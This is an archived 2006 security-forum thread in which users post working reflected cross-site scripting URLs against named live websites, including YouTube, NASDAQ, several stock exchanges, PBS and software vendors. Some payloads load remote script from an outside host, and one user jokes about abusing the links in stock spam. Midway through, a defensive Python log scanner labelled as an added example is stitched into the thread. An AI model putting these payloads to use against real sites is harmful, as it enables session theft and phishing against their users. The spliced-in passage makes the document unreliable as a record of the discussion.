Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 11 of 65
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:46PM

it's also interesting to note that i tested their Web Vulnerability Scanner (that flagship product of theirs) on their own test site for it, http://testphp.acunetix.com. It claims to check for XSS as well, but it failed to detect even the most basic <script>alert(/XSS/)</script> injection to its Search bar .. no breakout required.

So i'm not sure what XSS it's searching for, if it doesn't find the simplest vectors .-.

Edit: i take that back, it does find the XSS .. i thought the test was done, but it's still going ^^. so i really just wonder if they tested it on acunetix.com then..

/*end rant*/

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:51PM

The only working XSS scanner that I've found is wapiti, and that only picks up basic strings.

Re: So it begins
Posted by: Kyran
Date: September 28, 2006 01:55PM

I love Google's sense of humour.

Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 02:00PM

Look at the 3rd post from the bottom on the previous page.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: id
Date: September 28, 2006 02:17PM

Haha, nice catch Kyran

-id

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:02PM

http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bucket=ALL
http://search.ittoolbox.com/default.asp?r=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Submit1=Search
http://shops.ancestry.com/searchresultslist.asp?searchstring=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: kirke
Date: September 28, 2006 04:11PM

IIRC this thread is about full disclosure, not bashing any products. Even though there is a close relationship between both, for some obvious reason, it's unfair to compare both as equal, IMHO.

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 04:18PM

Yah, I kinda agree... although the stuff with F5 and Acunetix is funny, it probably belongs in another wall of shame thread. Product bashing in particular is 100% okay as that's how we learn how to fix lots of these problems, but let's keep it in another thread (anywhere else is fine - OMG Ponies or this sub-section). Whoever wants to start it is fine, just let this thread know and we can keep this one on track.

We're on such a good roll, I don't want to lose steam.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 28, 2006 04:30PM

Ok. Let's get back on track with another YouTube one.

Via post. http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.youtube.com/categories_portal&c=2&search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 04:45PM

More drama from Acunetix:

http://www.darkreading.com/document.asp?doc_id=104815

"Tamara Borg, Acunetix's marketing manager, wonders if maybe the hackers had hit the company's honeypots, which are purposely riddled with vulns."

Someone needs to make a movie of it/get Google to index it. Tamara isn't very bright. This is how people get fired - and a great case study on the very worst way to handle disclosures/press.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 28, 2006 04:45PM

http://www.youtube.com/groups_create?group_name=xss%22%3E%3Cscript%3Ealert('xss1')%3C/script%3E&tags=xss2%22%3E%3Cscript%3Ealert('xss2')%3C/script%3E - More YouTube

And to think, months ago when I was starting out, I thought youtube had no XSS holes. I wonder if I was just that ignorant, or just that lazy to not look. Lol.

- Kyran

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 04:53PM

http://www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5618f8037e6d3a0c8e6e9510c4030730/?javax.portlet.tpst=2080500d1d974fba0c39142cc4030730&javax.portlet.prp_2080500d1d974fba0c39142cc4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&withinQuery1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.safer-networking.org/index.php?page=search&lang=en&submit=&quickquery=%22%2F%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&submit.x=0&submit.y=0&submit=%3E - The home of Spybot S&D.

By the way, for anyone that doesn't have it yet, the Live HTTP Headers firefox extension makes things a lot easier.

Re: So it begins
Posted by: maluc
Date: September 28, 2006 05:00PM

that works kyran, but you have to be logged in to do so .. which for exploitation, might even be ideal

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 05:20PM

http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&sSection=ALL&x=0&y=0 - Took me a few tries because it only allows tags if they don't close.

Re: So it begins
Posted by: maluc
Date: September 28, 2006 05:25PM

heh, ya it's a good example of a filter that doesn't filter .. but it was posted by RSnake already last month _-_ http://sla.ckers.org/forum/read.php?3,44,738#msg-738 .. and still functional it seems

-maluc

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:28PM

http://www.nasdaq.com/portfolio/ptform2.asp?site=&sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&name=&submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:43PM

http://www.amex.com/quickquote/error.jsp?fldMessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Not American Express but American Stock Exchange.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:53PM

Italian Stock Exchange: http://www.borsaitaliana.it/bitApp/login.bit?username=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&submit.x=26&submit.y=14

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 10:00PM

Argh, it's so hard to find forms on some sites; does anyone know of a program that crawls links looking for forms on the site?

Re: So it begins
Posted by: rsnake
Date: September 28, 2006 10:21PM

Australian Stock Exchange: http://www.asx.com.au/asx/about/Feedback.jsp?referred='--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Ghozt, I'm sure you could write one pretty easily using wget and some regex, or you could write one from scratch, but that's actually going to miss a lot of things (like the asx.com.au link above, which doesn't use a form to populate that information).

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 10:34PM

http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&bucket=ALL

The following sites use the same search engine from TechTarget (substitute the subdomain for each name).

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 10:42PM

http://www.shop.com/op/aprod-~%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E-k24-g1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 11:15PM

Although not a big site, they have a lot of very important clients using the Search Server product.

http://www.hummingbird.com/SEARCH/search.html?searchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&searchType=Basic&Search.x=0&Search.y=0&Search=Search

> Hummingbird SearchServer is one of the fastest and most reliable full-text search engines on the market. It is the advanced information retrieval platform for high volume, line-of business, Linux, Microsoft Windows, UNIX, and Web applications and is widely used to develop electronic publishing, e-business, customer care, on-line technical support, and many other management solutions.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 12:16AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.usenext.com/UseNextDE/shopInt/obj/user/usShowLostPassword.cfm%3fSNUUID=1&sEmail=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (usenext.de)
http://morpheus.com/contact.asp?ref=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://sales.limewire.com/support/pro_lookup.php?payer_email=%3Cscript%20src=http://ha.ckers.org/xss.jpg
http://www.downloadsquad.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 12:29AM

http://www.pbs.org/search/search_results.html?q=<script>alert('xss')</script>&neighborhood=none

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 12:48AM

http://www.marketwatch.com/news/newsfinder/default.asp?value=%22%3Balert%28%27xss%27%29%3Bs.prop18=%22&property=word&doctype=806&scid=3&ctl25.x=6&ctl25.y=11

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 01:07AM

http://www.tucows.com/search?search_terms=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&search_scope=lin&search_adv=0&search_size=&search_size_multi=b
http://mybittorrent.com/?keywords=<script+src=http://ha.ckers.org/xss.jpg+&cat=&subcat=
http://www.phpnuke.org/modules.php?name=Search&query=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&topic=&category=0&author=&days=0&type=stories
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://nukecops.com/modules.php%3fname=Search&query=%253Cscript+src%253Dhttp%253A%252F%252Fha.ckers.org%252Fxss.jpg+&topic=&category=0&author=&days=0&type=stories - heh, Nukecops.

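A defender-side counterpart to the encoded probes collected in this thread, added here as an example that is not from the forum or from any product it mentions: it URL-decodes query parameters from request-log lines and flags the injection shapes seen above, including the unclosed `<script src=` tag, the double-encoded variant passed through the forwarder, and the JS-context `";alert(...)` breakout that contains no tag at all. The log lines and the `example.invalid` host are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed request-log lines (not taken from the thread) shaped after the
# probes posted above: closed <script> tag, unclosed "<script src=" tag,
# double-encoded probe, JS-context breakout, and one benign search.
SAMPLE_LOG = """\
GET /search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1
GET /?keywords=%3Cscript+src%3Dhttp%3A%2F%2Fexample.invalid%2Fx.js+&cat= HTTP/1.1
GET /modules.php?name=Search&query=%253Cscript+src%253Dhttp%253A%252F%252Fexample.invalid%252Fx.js+ HTTP/1.1
GET /news/newsfinder/default.asp?value=%22%3Balert%28%27xss%27%29%3Bs.prop18=%22&property=word HTTP/1.1
GET /search/?q=network+security+scanner&page=2 HTTP/1.1
"""

# Payload shapes to flag; the tag pattern deliberately does not require a
# closing ">" so filters that "only allow tags if they don't close" are covered.
PATTERNS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("js-call", re.compile(r"\balert\s*\(", re.I)),      # no tag needed in JS context
    ("event-handler", re.compile(r"\bon\w+\s*=", re.I)),
    ("js-url", re.compile(r"javascript\s*:", re.I)),
]

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so nested encodings such as %253C become '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value.replace("+", " "))
        if decoded == value:
            break
        value = decoded
    return value

def scan_request_line(line):
    """Return [(parameter, label), ...] for one 'METHOD path HTTP/x' line."""
    parts = line.split()
    if len(parts) < 2:
        return []
    hits = []
    for name, raw in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        value = fully_decode(raw)          # parse_qsl decoded once; go deeper
        for label, pattern in PATTERNS:
            if pattern.search(value):
                hits.append((name, label))
    return hits

def scan_log(text):
    """Map each flagged request line to its hits; clean lines are omitted."""
    report = {}
    for line in text.splitlines():
        hits = scan_request_line(line)
        if hits:
            report[line] = hits
    return report
```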
Re: So it begins
Posted by: thomaspollet
Date: September 29, 2006 04:05AM

I reported the phpnuke.org xss to them a while ago. Sad they haven't fixed it since then.
+ I love the stock market xss: go figure someone spamming about stock xyz skyrocketing, putting xss'ed links to nasdaq etc. on it... profit!

Is someone coding an xss scanner/fuzzer? I have some ideas on this subject.

Re: So it begins
Posted by: kirke
Date: September 29, 2006 04:26AM

> someone coding an xss scanner/fuzzer? I have some ideas on this subject.
hmm, there are countless fuzzers out in the wild, free and commercial ones.
Even acunetix is not that bad, if configured properly :-)
IMHO the scanners themselves are not the main problem, just the database they use, or the people using them improperly configured, or the time you have to wait for a zillion requests, etc. etc.

But this is all OT in this thread; someone should open another one in OMG or Projects.

Re: So it begins
Posted by: cheng
Date: September 29, 2006 04:31AM

maluc Wrote:
-------------------------------------------------------
> wow, that's a great first post cheng, because i
> honestly didn't know of an auto-executing tag
> property for IE .. it's not auto-executing per se
> .. but it's a mouseover for the entire webpage.
> interesting stuff.
>
> is this a deprecated function for eval? it doesn't
> seem to be well documented anywhere, in
> particular, w3schools makes no mention.
>
> -maluc


'expression()' is in the XSS Cheat Sheet.
Maybe this can give some help: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/methods/setexpression.asp
